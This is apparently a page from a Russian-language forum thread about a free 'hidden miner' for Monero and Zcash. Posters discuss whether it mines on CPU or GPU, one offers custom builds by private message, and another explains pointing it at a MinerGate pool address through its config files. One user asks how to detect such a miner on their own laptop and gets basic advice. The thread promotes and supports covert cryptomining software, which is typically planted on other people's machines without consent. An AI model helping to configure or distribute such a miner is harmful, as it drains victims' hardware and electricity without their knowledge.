Pages:
Author

Topic: Бесплатный скрытый майнер Monero+Zcash - page 5. (Read 3388 times)

newbie
Activity: 7
Merit: 0
Коллеги, я правильно понимаю, что майнится на видеокартах, или на процах? И если на процах, то есть ли сборка без майнинга на видеокартах?

Майнится и на проце и на видеокарте, если видеокарта не подходит, то только проц. Напиши в лс, могу сборку под тебя сделать.

В личку написал, но ответа нет. Вероятно блокируется из-за того, что я новичек на форуме.
newbie
Activity: 6
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
в pool.cnf пиши
stratum+tcp://xmr.pool.minergate.com:45560

в m.cnf почту

а в чем может быть проблема, если на пул хэши не идут? какие могут быть варианты?
newbie
Activity: 95
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
в pool.cnf пиши
stratum+tcp://xmr.pool.minergate.com:45560

в m.cnf почту
newbie
Activity: 6
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
newbie
Activity: 95
Merit: 0
Ребят а подскажите пожалуйста как проверить стоит ли у меня майнер? ноут работает сутками последнее время начал проц работать на износ !

Нагрузку смотри сторонними прогами. Поставь антивирус. Смотри автозапуск. Фаервол поставь и смотри какие проги куда конектятся.
member
Activity: 448
Merit: 10
Ребят а подскажите пожалуйста как проверить стоит ли у меня майнер? ноут работает сутками последнее время начал проц работать на износ !
newbie
Activity: 95
Merit: 0
Коллеги, я правильно понимаю, что майнится на видеокартах, или на процах? И если на процах, то есть ли сборка без майнинга на видеокартах?

Майнится и на проце и на видеокарте, если видеокарта не подходит, то только проц. Напиши в лс, могу сборку под тебя сделать.
newbie
Activity: 7
Merit: 0
Коллеги, я правильно понимаю, что майнится на видеокартах, или на процах? И если на процах, то есть ли сборка без майнинга на видеокартах?
full member
Activity: 518
Merit: 161